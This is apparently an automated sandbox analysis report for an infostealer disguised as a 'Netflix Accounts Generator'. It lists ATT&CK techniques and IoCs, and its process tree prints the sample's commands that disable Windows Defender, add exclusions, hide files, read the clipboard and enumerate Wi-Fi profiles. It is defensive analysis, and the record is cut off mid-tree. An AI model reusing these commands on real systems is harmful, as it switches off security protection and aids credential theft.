d164f45fc81b37c4782dd50fef5f60949cdbf5234d6196e91fb694acb706c872

Resubmissions

22-01-2025 11:49

250122-nza5rswjfj 10

22-01-2025 11:48

250122-nyfc4avlfs 10

Analysis

max time kernel
17s
max time network
31s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
22-01-2025 11:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Netflix_Accounts_Generator_v1.3.exe
Size

241.0MB
MD5

620a3065e5e601533c0e0eeefb6bbcb8
SHA1

02b6ee5ff1c425d477243a8fb14ed4213d603ebe
SHA256

d164f45fc81b37c4782dd50fef5f60949cdbf5234d6196e91fb694acb706c872
SHA512

2adcab6b11d75959b1f8f7b9131462f4e4315b655951bb5fcb1b0a75026e20f9a86bb0a993018de6e373c8722451dc02dd67a2b054b30f66dabfe0aea0d04cf9
SSDEEP

98304:nRfEtdFBGdamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RcOuAK1Rv/XE:ncFE4eN/FJMIDJf0gsAGK4RPuAK1pXE

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1256	powershell.exe
4244	powershell.exe
4280	powershell.exe
3988	powershell.exe
1172	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Netflix_Accounts_Generator_v1.3.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3684	cmd.exe
4876	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4912	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe
2752	Netflix_Accounts_Generator_v1.3.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
9	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
7	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1912	tasklist.exe
1508	tasklist.exe
4596	tasklist.exe
3852	tasklist.exe
4328	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2252	cmd.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001c00000002aaf9-21.dat	upx
behavioral1/memory/2752-25-0x00007FFF72380000-0x00007FFF727EE000-memory.dmp	upx
behavioral1/files/0x001900000002aae6-27.dat	upx
behavioral1/memory/2752-32-0x00007FFF7C160000-0x00007FFF7C16F000-memory.dmp	upx
behavioral1/memory/2752-31-0x00007FFF76C70000-0x00007FFF76C94000-memory.dmp	upx
behavioral1/files/0x001900000002aaf5-29.dat	upx
behavioral1/files/0x001900000002aaf4-34.dat	upx
behavioral1/files/0x001900000002aaef-48.dat	upx
behavioral1/files/0x001900000002aaee-47.dat	upx
behavioral1/files/0x001c00000002aaed-46.dat	upx
behavioral1/files/0x001900000002aaec-45.dat	upx
behavioral1/files/0x001900000002aae9-44.dat	upx
behavioral1/files/0x001900000002aae8-43.dat	upx
behavioral1/files/0x001c00000002aae7-42.dat	upx
behavioral1/files/0x001900000002aae3-41.dat	upx
behavioral1/files/0x001900000002ab00-40.dat	upx
behavioral1/files/0x001c00000002aaff-39.dat	upx
behavioral1/files/0x001900000002aafe-38.dat	upx
behavioral1/files/0x001900000002aaf8-35.dat	upx
behavioral1/memory/2752-54-0x00007FFF76C40000-0x00007FFF76C6D000-memory.dmp	upx
behavioral1/memory/2752-56-0x00007FFF78170000-0x00007FFF78189000-memory.dmp	upx
behavioral1/memory/2752-58-0x00007FFF78090000-0x00007FFF780AF000-memory.dmp	upx
behavioral1/memory/2752-60-0x00007FFF72200000-0x00007FFF72371000-memory.dmp	upx
behavioral1/memory/2752-62-0x00007FFF76C20000-0x00007FFF76C39000-memory.dmp	upx
behavioral1/memory/2752-64-0x00007FFF76CF0000-0x00007FFF76CFD000-memory.dmp	upx
behavioral1/memory/2752-66-0x00007FFF75B90000-0x00007FFF75BBE000-memory.dmp	upx
behavioral1/memory/2752-71-0x00007FFF72A90000-0x00007FFF72B48000-memory.dmp	upx
behavioral1/memory/2752-74-0x00007FFF76C70000-0x00007FFF76C94000-memory.dmp	upx
behavioral1/memory/2752-73-0x00007FFF71E80000-0x00007FFF721F5000-memory.dmp	upx
behavioral1/memory/2752-70-0x00007FFF72380000-0x00007FFF727EE000-memory.dmp	upx
behavioral1/memory/2752-76-0x00007FFF75B50000-0x00007FFF75B64000-memory.dmp	upx
behavioral1/memory/2752-79-0x00007FFF76C10000-0x00007FFF76C1D000-memory.dmp	upx
behavioral1/memory/2752-78-0x00007FFF76C40000-0x00007FFF76C6D000-memory.dmp	upx
behavioral1/memory/2752-82-0x00007FFF6DA10000-0x00007FFF6DB28000-memory.dmp	upx
behavioral1/memory/2752-81-0x00007FFF78170000-0x00007FFF78189000-memory.dmp	upx
behavioral1/memory/2752-83-0x00007FFF78090000-0x00007FFF780AF000-memory.dmp	upx
behavioral1/memory/2752-85-0x00007FFF72200000-0x00007FFF72371000-memory.dmp	upx
behavioral1/memory/2752-105-0x00007FFF76C20000-0x00007FFF76C39000-memory.dmp	upx
behavioral1/memory/2752-125-0x00007FFF72A90000-0x00007FFF72B48000-memory.dmp	upx
behavioral1/memory/2752-124-0x00007FFF75B90000-0x00007FFF75BBE000-memory.dmp	upx
behavioral1/memory/2752-266-0x00007FFF71E80000-0x00007FFF721F5000-memory.dmp	upx
behavioral1/memory/2752-278-0x00007FFF75B50000-0x00007FFF75B64000-memory.dmp	upx
behavioral1/memory/2752-295-0x00007FFF6DA10000-0x00007FFF6DB28000-memory.dmp	upx
behavioral1/memory/2752-311-0x00007FFF72200000-0x00007FFF72371000-memory.dmp	upx
behavioral1/memory/2752-305-0x00007FFF72380000-0x00007FFF727EE000-memory.dmp	upx
behavioral1/memory/2752-310-0x00007FFF78090000-0x00007FFF780AF000-memory.dmp	upx
behavioral1/memory/2752-306-0x00007FFF76C70000-0x00007FFF76C94000-memory.dmp	upx
behavioral1/memory/2752-315-0x00007FFF72A90000-0x00007FFF72B48000-memory.dmp	upx
behavioral1/memory/2752-314-0x00007FFF75B90000-0x00007FFF75BBE000-memory.dmp	upx
behavioral1/memory/2752-338-0x00007FFF75B90000-0x00007FFF75BBE000-memory.dmp	upx
behavioral1/memory/2752-345-0x00007FFF75B50000-0x00007FFF75B64000-memory.dmp	upx
behavioral1/memory/2752-344-0x00007FFF71E80000-0x00007FFF721F5000-memory.dmp	upx
behavioral1/memory/2752-343-0x00007FFF6DA10000-0x00007FFF6DB28000-memory.dmp	upx
behavioral1/memory/2752-342-0x00007FFF76C10000-0x00007FFF76C1D000-memory.dmp	upx
behavioral1/memory/2752-339-0x00007FFF72A90000-0x00007FFF72B48000-memory.dmp	upx
behavioral1/memory/2752-337-0x00007FFF76CF0000-0x00007FFF76CFD000-memory.dmp	upx
behavioral1/memory/2752-336-0x00007FFF76C20000-0x00007FFF76C39000-memory.dmp	upx
behavioral1/memory/2752-335-0x00007FFF72200000-0x00007FFF72371000-memory.dmp	upx
behavioral1/memory/2752-334-0x00007FFF78090000-0x00007FFF780AF000-memory.dmp	upx
behavioral1/memory/2752-333-0x00007FFF78170000-0x00007FFF78189000-memory.dmp	upx
behavioral1/memory/2752-332-0x00007FFF76C40000-0x00007FFF76C6D000-memory.dmp	upx
behavioral1/memory/2752-331-0x00007FFF7C160000-0x00007FFF7C16F000-memory.dmp	upx
behavioral1/memory/2752-330-0x00007FFF76C70000-0x00007FFF76C94000-memory.dmp	upx
behavioral1/memory/2752-329-0x00007FFF72380000-0x00007FFF727EE000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3544	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1352	cmd.exe
2700	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2316	WMIC.exe
768	WMIC.exe
4220	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
8	systeminfo.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3544	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1256	powershell.exe
4280	powershell.exe
4280	powershell.exe
1256	powershell.exe
4244	powershell.exe
4244	powershell.exe
4876	powershell.exe
4876	powershell.exe
3400	powershell.exe
3400	powershell.exe
4876	powershell.exe
3400	powershell.exe
3988	powershell.exe
3988	powershell.exe
3996	powershell.exe
3996	powershell.exe
1172	powershell.exe
1172	powershell.exe
1768	powershell.exe
1768	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	4328	tasklist.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeIncreaseQuotaPrivilege	2516	WMIC.exe
Token: SeSecurityPrivilege	2516	WMIC.exe
Token: SeTakeOwnershipPrivilege	2516	WMIC.exe
Token: SeLoadDriverPrivilege	2516	WMIC.exe
Token: SeSystemProfilePrivilege	2516	WMIC.exe
Token: SeSystemtimePrivilege	2516	WMIC.exe
Token: SeProfSingleProcessPrivilege	2516	WMIC.exe
Token: SeIncBasePriorityPrivilege	2516	WMIC.exe
Token: SeCreatePagefilePrivilege	2516	WMIC.exe
Token: SeBackupPrivilege	2516	WMIC.exe
Token: SeRestorePrivilege	2516	WMIC.exe
Token: SeShutdownPrivilege	2516	WMIC.exe
Token: SeDebugPrivilege	2516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2516	WMIC.exe
Token: SeRemoteShutdownPrivilege	2516	WMIC.exe
Token: SeUndockPrivilege	2516	WMIC.exe
Token: SeManageVolumePrivilege	2516	WMIC.exe
Token: 33	2516	WMIC.exe
Token: 34	2516	WMIC.exe
Token: 35	2516	WMIC.exe
Token: 36	2516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2516	WMIC.exe
Token: SeSecurityPrivilege	2516	WMIC.exe
Token: SeTakeOwnershipPrivilege	2516	WMIC.exe
Token: SeLoadDriverPrivilege	2516	WMIC.exe
Token: SeSystemProfilePrivilege	2516	WMIC.exe
Token: SeSystemtimePrivilege	2516	WMIC.exe
Token: SeProfSingleProcessPrivilege	2516	WMIC.exe
Token: SeIncBasePriorityPrivilege	2516	WMIC.exe
Token: SeCreatePagefilePrivilege	2516	WMIC.exe
Token: SeBackupPrivilege	2516	WMIC.exe
Token: SeRestorePrivilege	2516	WMIC.exe
Token: SeShutdownPrivilege	2516	WMIC.exe
Token: SeDebugPrivilege	2516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2516	WMIC.exe
Token: SeRemoteShutdownPrivilege	2516	WMIC.exe
Token: SeUndockPrivilege	2516	WMIC.exe
Token: SeManageVolumePrivilege	2516	WMIC.exe
Token: 33	2516	WMIC.exe
Token: 34	2516	WMIC.exe
Token: 35	2516	WMIC.exe
Token: 36	2516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2316	WMIC.exe
Token: SeSecurityPrivilege	2316	WMIC.exe
Token: SeTakeOwnershipPrivilege	2316	WMIC.exe
Token: SeLoadDriverPrivilege	2316	WMIC.exe
Token: SeSystemProfilePrivilege	2316	WMIC.exe
Token: SeSystemtimePrivilege	2316	WMIC.exe
Token: SeProfSingleProcessPrivilege	2316	WMIC.exe
Token: SeIncBasePriorityPrivilege	2316	WMIC.exe
Token: SeCreatePagefilePrivilege	2316	WMIC.exe
Token: SeBackupPrivilege	2316	WMIC.exe
Token: SeRestorePrivilege	2316	WMIC.exe
Token: SeShutdownPrivilege	2316	WMIC.exe
Token: SeDebugPrivilege	2316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2316	WMIC.exe
Token: SeRemoteShutdownPrivilege	2316	WMIC.exe
Token: SeUndockPrivilege	2316	WMIC.exe
Token: SeManageVolumePrivilege	2316	WMIC.exe
Token: 33	2316	WMIC.exe
Token: 34	2316	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3564	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 936 wrote to memory of 2752	936	Netflix_Accounts_Generator_v1.3.exe	77
PID 936 wrote to memory of 2752	936	Netflix_Accounts_Generator_v1.3.exe	77
PID 2752 wrote to memory of 4788	2752	Netflix_Accounts_Generator_v1.3.exe	78
PID 2752 wrote to memory of 4788	2752	Netflix_Accounts_Generator_v1.3.exe	78
PID 2752 wrote to memory of 2964	2752	Netflix_Accounts_Generator_v1.3.exe	79
PID 2752 wrote to memory of 2964	2752	Netflix_Accounts_Generator_v1.3.exe	79
PID 2752 wrote to memory of 2232	2752	Netflix_Accounts_Generator_v1.3.exe	80
PID 2752 wrote to memory of 2232	2752	Netflix_Accounts_Generator_v1.3.exe	80
PID 2752 wrote to memory of 4336	2752	Netflix_Accounts_Generator_v1.3.exe	83
PID 2752 wrote to memory of 4336	2752	Netflix_Accounts_Generator_v1.3.exe	83
PID 2752 wrote to memory of 2308	2752	Netflix_Accounts_Generator_v1.3.exe	86
PID 2752 wrote to memory of 2308	2752	Netflix_Accounts_Generator_v1.3.exe	86
PID 4788 wrote to memory of 1256	4788	cmd.exe	88
PID 4788 wrote to memory of 1256	4788	cmd.exe	88
PID 2964 wrote to memory of 4280	2964	cmd.exe	89
PID 2964 wrote to memory of 4280	2964	cmd.exe	89
PID 4336 wrote to memory of 4328	4336	cmd.exe	90
PID 4336 wrote to memory of 4328	4336	cmd.exe	90
PID 2232 wrote to memory of 1496	2232	cmd.exe	91
PID 2232 wrote to memory of 1496	2232	cmd.exe	91
PID 2308 wrote to memory of 2516	2308	cmd.exe	92
PID 2308 wrote to memory of 2516	2308	cmd.exe	92
PID 2752 wrote to memory of 2860	2752	Netflix_Accounts_Generator_v1.3.exe	167
PID 2752 wrote to memory of 2860	2752	Netflix_Accounts_Generator_v1.3.exe	167
PID 2860 wrote to memory of 4216	2860	cmd.exe	96
PID 2860 wrote to memory of 4216	2860	cmd.exe	96
PID 2752 wrote to memory of 1708	2752	Netflix_Accounts_Generator_v1.3.exe	97
PID 2752 wrote to memory of 1708	2752	Netflix_Accounts_Generator_v1.3.exe	97
PID 1708 wrote to memory of 4236	1708	cmd.exe	99
PID 1708 wrote to memory of 4236	1708	cmd.exe	99
PID 2752 wrote to memory of 4056	2752	Netflix_Accounts_Generator_v1.3.exe	100
PID 2752 wrote to memory of 4056	2752	Netflix_Accounts_Generator_v1.3.exe	100
PID 4056 wrote to memory of 2316	4056	cmd.exe	148
PID 4056 wrote to memory of 2316	4056	cmd.exe	148
PID 2752 wrote to memory of 2292	2752	Netflix_Accounts_Generator_v1.3.exe	103
PID 2752 wrote to memory of 2292	2752	Netflix_Accounts_Generator_v1.3.exe	103
PID 2292 wrote to memory of 768	2292	cmd.exe	105
PID 2292 wrote to memory of 768	2292	cmd.exe	105
PID 2752 wrote to memory of 2252	2752	Netflix_Accounts_Generator_v1.3.exe	106
PID 2752 wrote to memory of 2252	2752	Netflix_Accounts_Generator_v1.3.exe	106
PID 2252 wrote to memory of 1128	2252	cmd.exe	108
PID 2252 wrote to memory of 1128	2252	cmd.exe	108
PID 2752 wrote to memory of 392	2752	Netflix_Accounts_Generator_v1.3.exe	109
PID 2752 wrote to memory of 392	2752	Netflix_Accounts_Generator_v1.3.exe	109
PID 392 wrote to memory of 4244	392	cmd.exe	111
PID 392 wrote to memory of 4244	392	cmd.exe	111
PID 2752 wrote to memory of 4392	2752	Netflix_Accounts_Generator_v1.3.exe	112
PID 2752 wrote to memory of 4392	2752	Netflix_Accounts_Generator_v1.3.exe	112
PID 2752 wrote to memory of 2576	2752	Netflix_Accounts_Generator_v1.3.exe	113
PID 2752 wrote to memory of 2576	2752	Netflix_Accounts_Generator_v1.3.exe	113
PID 2576 wrote to memory of 1912	2576	cmd.exe	116
PID 2576 wrote to memory of 1912	2576	cmd.exe	116
PID 4392 wrote to memory of 1508	4392	cmd.exe	117
PID 4392 wrote to memory of 1508	4392	cmd.exe	117
PID 2752 wrote to memory of 4208	2752	Netflix_Accounts_Generator_v1.3.exe	118
PID 2752 wrote to memory of 4208	2752	Netflix_Accounts_Generator_v1.3.exe	118
PID 2752 wrote to memory of 3684	2752	Netflix_Accounts_Generator_v1.3.exe	119
PID 2752 wrote to memory of 3684	2752	Netflix_Accounts_Generator_v1.3.exe	119
PID 2752 wrote to memory of 4512	2752	Netflix_Accounts_Generator_v1.3.exe	120
PID 2752 wrote to memory of 4512	2752	Netflix_Accounts_Generator_v1.3.exe	120
PID 2752 wrote to memory of 4684	2752	Netflix_Accounts_Generator_v1.3.exe	122
PID 2752 wrote to memory of 4684	2752	Netflix_Accounts_Generator_v1.3.exe	122
PID 2752 wrote to memory of 1352	2752	Netflix_Accounts_Generator_v1.3.exe	126
PID 2752 wrote to memory of 1352	2752	Netflix_Accounts_Generator_v1.3.exe	126

Views/modifies file attributes 1 TTPs 2 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1176	attrib.exe
1160	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe
"C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:936
- C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe
  "C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The operating system version is not compatibile with this product.', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The operating system version is not compatibile with this product.', 0, 'Error', 0+16);close()"
      4⤵
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2252
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Netflix_Accounts_Generator_v1.3.exe"
      4⤵
      PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎  .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍‎  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4392
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4512
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4684
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1352
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1320
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:704
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3108
- - C:\Windows\system32\cmd.exe
